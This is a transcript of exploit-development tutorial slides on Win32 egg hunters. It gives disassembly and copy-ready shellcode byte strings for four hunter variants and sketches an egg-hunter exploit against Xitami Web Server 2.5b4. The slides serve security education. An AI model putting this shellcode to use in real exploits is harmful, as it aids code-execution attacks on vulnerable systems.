exploit research and development megaprimer: win32 egghunter
DESCRIPTION
Exploit Research and Development Megaprimer http://opensecurity.in/exploit-research-and-development-megaprimer/ http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyfTRANSCRIPT
Exploit Research
Egg Hunter
KERALA CYBER FORCEWWW.KERALACYBERFORCE.IN
AJIN ABRAHAM@ajinabraham
@ajinabraham
Why before What !!
Limited Buffer Space
Shellcode = Broken Shellcode
@ajinabraham
You can’t fill an useful shellcode here
Buffer size is too small.
@ajinabraham
Solution = Egg Hunting
@ajinabraham
SOME TERMS RELATED TO EGG HUNTING Tag: A unique string of 4bytes that act as a marker or tag to search and
locate the shellcode.
Egg: It’s an 8 bytes string formed by combining to tags.tag+tag+shellcode
Egg Hunter: Small piece of instructions we fill in the limited buffer, which will search the entire stack or heap to locate the shellcode by searching for the tag and finally will execute the shellcode.
The Egg and the Egg Hunter is also a part of shellcode.
The bad character restrictions applies to egg hunter instructions too.
@ajinabraham
What is Egg Hunting?
Egg hunting is a useful exploitation technique implemented to overcome the deficiency of a small buffer that cannot hold our lengthy shellcode.
We might have access to some large buffer in the memory somewhere else. We will prepend a tag of 4byte length 2 times forming 8 bytes to our shellcode and place it in the large buffer.
Now we will fill our small buffer with a jump instruction to the egg hunter. The egg hunter will then search the stack or the heap for two consecutive tags and find out the shellcode and execute it.
Egg Hunter Implementation in Windows
SEH, IsBadReadPtr, NtDisplayString, NtAccessCheckAndAuditAlarm
@ajinabraham
SEH 00000000 EB21 jmp short 0x23
00000002 59 pop ecx 00000003 B86C78786C mov eax,0x6C78786C #TAG (lxxl)00000008 51 push ecx00000009 6AFF push byte -0x1 0000000B 33DB xor ebx,ebx 0000000D 648923 mov [fs:ebx],esp 00000010 6A02 push byte +0x200000012 59 pop ecx 00000013 8BFB mov edi,ebx 00000015 F3AF repe scasd 00000017 7507 jnz 0x20 00000019 FFE7 jmp edi 0000001B 6681CBFF0F or bx,0xfff 00000020 43 inc ebx 00000021 EBED jmp short 0x10 00000023 E8DAFFFFFF call 0x2 00000028 6A0C push byte +0xc 0000002A 59 pop ecx 0000002B 8B040C mov eax,[esp+ecx] 0000002E B1B8 mov cl,0xb8 00000030 83040806 add dword [eax+ecx],byte +0x6 00000034 58 pop eax 00000035 83C410 add esp,byte +0x10 00000038 50 push eax 00000039 33C0 xor eax,eax 0000003B C3 ret
Size: 60 bytes Targets: Windows 95/98/ME/NT/2000/XP/2003 Egg Size: 8 bytes
The egg hunter is broken into 3 parts1. Exception handler registration.2. Egg comparison code.3. Exception handler.
Credits: skape
@ajinabraham
Shellcode
egghunter = "\xeb\x21\x59\xb8“ egghunter+=“lxxl“ #tag egghunter+=("\x51\x6a\xff\x33\xdb\x64\x89\x23\x6a\x02\x59\x8b\xfb" "\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb""\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1"
"\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3“)
@ajinabraham
IsBadReadPtr
00000000 33DB xor ebx,ebx 00000002 6681CBFF0F or bx,0xfff 00000007 43 inc ebx 00000008 6A08 push byte +0x8 0000000A 53 push ebx 0000000B B80D5BE777 mov eax,0x77e75b0d 00000010 FFD0 call eax 00000012 85C0 test eax,eax 00000014 75EC jnz 0x2 00000016 B86C78786C mov eax,0x6C78786C #TAG (lxxl) 0000001B 8BFB mov edi,ebx 0000001D AF scasd 0000001E 75E7 jnz 0x7 00000020 AF scasd 00000021 75E4 jnz 0x7 00000023 FFE7 jmp edi
Size: 37 bytes Targets: Windows 95/98/ME/NT/2000/XP/2003 Egg Size: 8 bytes
Credits: skape
@ajinabraham
Shellcode
egghunter = ("\x33\xdb\x66\x81\xcb\xff\x0f\x43\x6a\x08" "\x53\xb8\x0d\x5b\xe7\x77\xff\xd0\x85\xc0\x75\xec\xb8“)egghunter+=“lxxl“ #tagegghunter+="\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
@ajinabraham
NtDisplayString
00000000 6681CAFF0F or dx,0xfff 00000005 42 inc edx 00000006 52 push edx 00000007 6A43 push byte +0x43 00000009 58 pop eax 0000000A CD2E int 0x2e 0000000C 3C05 cmp al,0x5 0000000E 5A pop edx0000000F 74EF jz 0x0 00000011 B86C78786C mov eax,0x6C78786C #TAG (lxxl)00000016 8BFA mov edi,edx 00000018 AF scasd 00000019 75EA jnz 0x5 0000001B AF scasd 0000001C 75E7 jnz 0x5 0000001E FFE7 jmp edi
Size: 32 bytes Targets: Windows NT/2000/XP/2003 Egg Size: 8 bytes
Credits: skape
@ajinabraham
Shellcode
egghunter="\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8“egghunter+=“lxxl“ #Tagegghunter+="\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
@ajinabraham
NtAccessCheckAndAuditAlarm
00000000 6681CAFF0F or dx,0xfff 00000005 42 inc edx 00000006 52 push edx 00000007 6A02 push byte +0x200000009 58 pop eax 0000000A CD2E int 0x2e 0000000C 3C05 cmp al,0x5 0000000E 5A pop edx0000000F 74EF jz 0x0 00000011 B86C78786C mov eax,0x6C78786C #TAG (lxxl)00000016 8BFA mov edi,edx 00000018 AF scasd 00000019 75EA jnz 0x5 0000001B AF scasd 0000001C 75E7 jnz 0x5 0000001E FFE7 jmp edi
Size: 32 bytes Targets: Windows NT/2000/XP/2003 Egg Size: 8 bytes
The Difference between NtDisplayString and NtAccessCheckAndAuditAlarm is that both uses a different syscall to check if an access violation had occurred or not.
@ajinabraham
Shellcode
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8“egghunter+=“lxxl" # TAGegghunter+= "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
@ajinabraham
NtDisplayString / NtAccessCheckAndAuditAlarm
6681CAFF0F or dx,0x0fff ; get last address in page 42 inc edx ; acts as a counter (increments the value in EDX) 52 push edx ; pushes edx value to the stack
; (saves our current address on the stack) 6A43 push byte +0x43 ; push 0x43 for NtDisplayString ; or 0x2 for NtAccessCheckAndAuditAlarm to stack58 pop eax ; pop 0x43 or 0x2 into eax
; so it can be used as parameter to syscallCD2E int 0x2e ; make a syscall using the previous register 3C05 cmp al,0x5 ; check if access violation occurs
; (0xc0000005== ACCESS_VIOLATION)5A pop edx ; restore edx 74EF je xxxx ; jmp back to start dx 0x0fffff B86C78786C mov eax,0x6C78786C ; tag (lxxl)8BFA mov edi,edx ; set edi to our pointer AF scasd ; compare for status 75EA jnz xxxxxx ; (back to inc edx) check egg found or not AF scasd ; when egg has been found 75E7 jnz xxxxx ; (jump back to "inc edx") ; if only the first egg was found
FFE7 jmp edi ; edi points to begin of the shellcode Credits: corelanc0d3r
@ajinabraham
Limitation of these Egg hunters
SEH, IsBadReadPtr, NtDisplayString, NtAccessCheckAndAuditAlarm will work only on Windows NT/2000/XP/2003
So for you can’t use this Egg Hunter implementation for the later build of Windows like 7 and 8.
@ajinabraham
Lets build up an Exploit
Software: Xitami Web Server 2.5b4
Egg Hunter Implementation: NtAccessCheckAndAuditAlarm (32bytes hunter and 8 bytes egg)
@ajinabraham
Normal EIP overwrite
Shellcode EIP
ESP
ESP
Need For Egg Hunter
Shellcode EIP
JMP to ESP
JMP to ESP
@ajinabraham
Egg Hunter Implementation
ESP
JMP to reach Egg
hunter
EIP
JMP to ESP
Egg + Shellcode
Jump to some location with enough buffer
Egg Hunter
Search for Egg, find it and execute shellcode
@ajinabraham
Thank You